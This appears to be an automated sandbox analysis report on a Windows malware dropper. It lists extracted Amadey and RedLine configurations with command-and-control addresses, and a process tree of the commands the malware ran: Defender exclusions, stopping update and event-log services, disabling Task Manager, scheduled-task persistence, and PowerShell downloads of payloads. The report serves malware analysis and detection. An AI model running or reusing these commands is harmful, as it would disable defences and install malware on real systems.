Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows11-21h2_x64 -
resource
win11-20240611-en -
resource tags
-
submitted
24-06-2024 03:52
General
-
Target
2f0e9f9c59cc215b8c464caf38afd35cc81233e167aa5da8c85bdcd7ddae6926.exe
-
Size
1.8MB
-
MD5
df588b049fe995e5426e8b7b6f34a13e
-
SHA1
85a09dcd24850586e06f4da91ddd2c6d761a781c
-
SHA256
2f0e9f9c59cc215b8c464caf38afd35cc81233e167aa5da8c85bdcd7ddae6926
-
SHA512
36fbb9780af894b3a3771fd89841e4e24cff70487fb6bcae333499e73da2e844d56754386c6309fdf1f513c99fccba2b6d800cc2fb51733cbe61ee542b4dfae5
-
SSDEEP
49152:e8yWaTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTn:HyZTTTTTTTTTTTTTTTTTTTTTTTTTTTT/
Malware Config
Extracted
amadey
8254624243
e76b71
http://77.91.77.81
-
install_dir
8254624243
-
install_file
axplong.exe
-
strings_key
90049e51fabf09df0d6748e0b271922e
-
url_paths
/Kiru9gu/index.php
Extracted
redline
AMA
185.215.113.67:40960
Extracted
redline
LiveTraffic
4.185.27.237:13528
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 3 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
-
XMRig Miner payload 9 IoCs
-
Blocklisted process makes network request 4 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Powershell Invoke Web Request.
-
Creates new service(s) 2 TTPs
-
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Executes dropped EXE 21 IoCs
-
Identifies Wine through registry keys 2 TTPs 4 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
UPX packed file 14 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
-
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
-
Drops file in System32 directory 4 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
-
Suspicious use of SetThreadContext 5 IoCs
-
Drops file in Windows directory 2 IoCs
-
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 6 IoCs
-
Modifies data under HKEY_USERS 50 IoCs
-
Modifies registry class 3 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 42 IoCs
-
Suspicious use of FindShellTrayWindow 26 IoCs
-
Suspicious use of SendNotifyMessage 12 IoCs
-
Suspicious use of SetWindowsHookEx 7 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2f0e9f9c59cc215b8c464caf38afd35cc81233e167aa5da8c85bdcd7ddae6926.exe"C:\Users\Admin\AppData\Local\Temp\2f0e9f9c59cc215b8c464caf38afd35cc81233e167aa5da8c85bdcd7ddae6926.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1000007001\ama.exe"C:\Users\Admin\AppData\Local\Temp\1000007001\ama.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.co/1lLub4⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa8c193cb8,0x7ffa8c193cc8,0x7ffa8c193cd85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,7050966095827309423,2256218554182299137,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2064 /prefetch:25⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,7050966095827309423,2256218554182299137,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2052,7050966095827309423,2256218554182299137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2836 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7050966095827309423,2256218554182299137,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3128 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7050966095827309423,2256218554182299137,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3148 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,7050966095827309423,2256218554182299137,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5256 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2052,7050966095827309423,2256218554182299137,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5220 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7050966095827309423,2256218554182299137,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4652 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7050966095827309423,2256218554182299137,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4580 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7050966095827309423,2256218554182299137,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7050966095827309423,2256218554182299137,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,7050966095827309423,2256218554182299137,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1020 /prefetch:25⤵
-
C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe"C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe"C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe"C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1000014001\1.exe"C:\Users\Admin\AppData\Local\Temp\1000014001\1.exe"5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 756 -s 3846⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000015001\FirstZ.exe"C:\Users\Admin\AppData\Local\Temp\1000015001\FirstZ.exe"5⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart6⤵
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart7⤵
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc6⤵
- Launches sc.exe
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "WSNKISKT"6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "WSNKISKT"6⤵
- Launches sc.exe
-
C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exe"C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd /c ins.bat4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"5⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"5⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\install.bat' -Verb runAs -WindowStyle Hidden"5⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\install.bat"6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "Cleaner" /tr "C:\Users\Admin\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe" /sc onstart /delay 0005:007⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 000000017⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F7⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F7⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/frielandrews892/File/releases/download/File/File.zip' -OutFile 'C:\Users\Admin\AppData\Local\Corporation.zip'"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Corporation.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Corporation'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exeschtasks /query /TN "Cleaner"5⤵
-
C:\Users\Admin\AppData\Local\Temp\1000092001\legs.exe"C:\Users\Admin\AppData\Local\Temp\1000092001\legs.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2900 -s 2844⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000094001\taskweaker.exe"C:\Users\Admin\AppData\Local\Temp\1000094001\taskweaker.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeC:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\1000099001\Collective.exe"C:\Users\Admin\AppData\Local\Temp\1000099001\Collective.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\._cache_Collective.exe"C:\Users\Admin\AppData\Local\Temp\._cache_Collective.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\Synaptics\Synaptics.exe"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate4⤵
- Executes dropped EXE
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe"C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2900 -ip 29001⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 756 -ip 7561⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exeC:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\ProgramData\wikombernizc\reakuqnanrkn.exeC:\ProgramData\wikombernizc\reakuqnanrkn.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exeC:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751Filesize
717B
MD5822467b728b7a66b081c91795373789a
SHA1d8f2f02e1eef62485a9feffd59ce837511749865
SHA256af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751Filesize
192B
MD57b3a244cb3c1c7a1bccc4e8d4d6cd2a0
SHA153d4cbf24f707a957a42f789e3aa6548c173d915
SHA256d8fd92113f08f85d8f18fac262fd947db140fc83cc918056bee1e356d48ddea7
SHA51200c3bd57996a300e40488cb667b7841df7ed2c4d6d4bfbecc5c2b2bc9a84f67c354f568c142f2a988defc53d4ad4b901e0f10dbb03e105d634cadd83e397dd64
-
C:\Users\Admin\AppData\Local\Corporation.zipFilesize
16.3MB
MD59cb5edb138b8df3492c0b14b56d617ac
SHA1b02dfae970d31251d2f94cf14328f757ceb45c98
SHA256de8c63974461298010c9b9c8a97e769f72f271e976bdbb54dee45264f8a0eda8
SHA51250306f663098471c9aa51d9024bce4b8a25baec2fab2424909b481a4d223feda5311111831eb9084115686782c0c831f81ef5ccdb32b7a6833ff811ff51d4929
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD55f4c933102a824f41e258078e34165a7
SHA1d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\3693a31a-353e-44f8-98bf-35a71f9d1e7f.tmpFilesize
11KB
MD54b0301ffcc80f12e58b6b938ab05e320
SHA10d7f29a0f628e66bf3d719ee4b00216c387d7de0
SHA256865a47c6043138d7155f2964b86d9c5efdccb22a71b2feb244c738d6966e494a
SHA512d98e36c8d2129de5fbe040b96b5b6e3da540806f02c204fbf3579e05ba0387a39873da0a47501b5e55b7065d75d1c1e4cae8a3c5e6fcd39a8a5d03e91eab8a14
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5bbfb66ff6f5e565ac00d12dbb0f4113d
SHA18ee31313329123750487278afb3192d106752f17
SHA256165401ef4e6bbd51cb89d3f9e6dc13a50132669d5b0229c7db12f2ec3f605754
SHA5128ea206daabc7895923f3df9798bfd96f459bf859c78f3e5640fad550678b5090539f2a1b590883cd9797efee999acccac16d499772f61f5390e91bcc44d60560
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD59a91b6dd57fc9c4880d34e9e7c6b760f
SHA177a09da6ef4343a8b232386e000cd2d6b9fc30a3
SHA2560170297f0103d4e415653f86dedc31b0827580042f86862206fd3f6f135b543a
